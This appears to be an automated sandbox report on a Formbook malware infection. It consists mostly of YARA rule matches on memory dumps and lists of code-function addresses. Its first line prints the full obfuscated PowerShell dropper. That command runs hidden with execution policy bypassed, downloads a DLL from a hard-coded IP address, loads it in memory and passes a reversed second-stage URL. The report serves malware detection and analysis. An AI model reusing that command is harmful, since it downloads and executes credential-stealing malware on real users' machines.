Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.608771918.000002823988E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.609935000.00000282490C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000015.00000002.605217866.0000028239656000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTR Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6508, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF9F16F1DF8 6_2_00007FF9F16F1DF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF9F16F1D70 6_2_00007FF9F16F1D70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF9F16F1988 7_2_00007FF9F16F1988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF9F16F0C6B 7_2_00007FF9F16F0C6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040909B 9_2_0040909B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004090A0 9_2_004090A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401209 9_2_00401209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00402D88 9_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041D7DD 9_2_0041D7DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041CFAA 9_2_0041CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C322AE 9_2_02C322AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9EBB0 9_2_02B9EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2DBD2 9_2_02C2DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C203DA 9_2_02C203DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C32B28 9_2_02C32B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7B090 9_2_02B7B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C328EC 9_2_02C328EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C320A8 9_2_02C320A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21002 9_2_02C21002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3E824 9_2_02C3E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6F900 9_2_02B6F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C32EF7 9_2_02C32EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B86E30 9_2_02B86E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2D616 9_2_02C2D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3DFCE 9_2_02C3DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C31FF1 9_2_02C31FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2D466 9_2_02C2D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7841F 9_2_02B7841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C325DD 9_2_02C325DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92581 9_2_02B92581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7D5E0 9_2_02B7D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B60D20 9_2_02B60D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C31D55 9_2_02C31D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C32D07 9_2_02C32D07
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FF9F16E0CD0 14_2_00007FF9F16E0CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FF9F16E0D30 14_2_00007FF9F16E0D30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477841F 23_2_0477841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482D466 23_2_0482D466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04760D20 23_2_04760D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048325DD 23_2_048325DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04832D07 23_2_04832D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477D5E0 23_2_0477D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04831D55 23_2_04831D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04792581 23_2_04792581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04786E30 23_2_04786E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04832EF7 23_2_04832EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482D616 23_2_0482D616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483DFCE 23_2_0483DFCE
